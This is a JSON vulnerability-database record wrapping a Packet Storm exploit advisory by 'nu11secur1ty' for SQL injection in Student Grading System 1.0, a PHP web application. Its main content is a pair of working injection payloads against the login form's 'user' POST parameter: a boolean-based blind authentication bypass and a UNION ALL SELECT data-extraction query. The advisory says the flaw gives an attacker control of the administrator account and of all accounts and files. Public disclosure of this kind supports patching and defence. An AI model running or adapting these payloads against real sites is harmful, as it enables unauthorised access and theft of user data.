{"id": "PACKETSTORM:166287", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Student Grading System 1.0 SQL Injection", "description": "", "published": "2022-03-14T00:00:00", "modified": "2022-03-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/166287/Student-Grading-System-1.0-SQL-Injection.html", "reporter": "nu11secur1ty", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-03-14T19:11:51", "viewCount": 65, "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "vulnersScore": -0.1}, "_state": {"dependencies": 1647719310}, "_internal": {}, "sourceHref": "https://packetstormsecurity.com/files/download/166287/sgs10-sql.txt", "sourceData": "`## Title: Student Grading System v1.0 SQLi \n## Author: nu11secur1ty \n## Date: 03.14.2022 \n## Vendor: https://www.sourcecodester.com/users/tips23 \n## Software: https://www.sourcecodester.com/php/14522/student-grading-system-using-phpmysql-source-code.html \n## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Student-Grading-System \n \n## Description: \nThe `user` parameter appears to be vulnerable to SQL injection attacks. \nA single quote was submitted in the user parameter, and a database \nerror message was returned. \nTwo single quotes were then submitted and the error message disappeared. \nYou should review the contents of the error message, and the \napplication's handling of other input, to confirm whether a \nvulnerability is present. \nThe attacker can take administrator account control and also of all \naccounts and files information on this system, also the malicious user \ncan download all information about this system. \n \nStatus: CRITICAL \n \n[+] Payloads: \n \n```mysql \n \n--- \nParameter: user (POST) \nType: boolean-based blind \nTitle: OR boolean-based blind - WHERE or HAVING clause \nPayload: user=-6693' OR 2950=2950-- qPwW&pwd=d0Y!w7s!B1 \n \nType: UNION query \nTitle: Generic UNION query (random number) - 6 columns \nPayload: user=-7952' UNION ALL SELECT \n5650,5650,CONCAT(0x71786a7a71,0x7564497973726b65496f6e5778706143684359517149546e46776d6843484a504e624e7967484c57,0x716b627171),5650,5650,5650-- \n-&pwd=d0Y!w7s!B1 \n--- \n \n``` \n \n## Reproduce: \n[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Student-Grading-System) \n \n## Proof and Exploit: \n[href](https://streamable.com/h0x4xl) \n \n \n`\n"}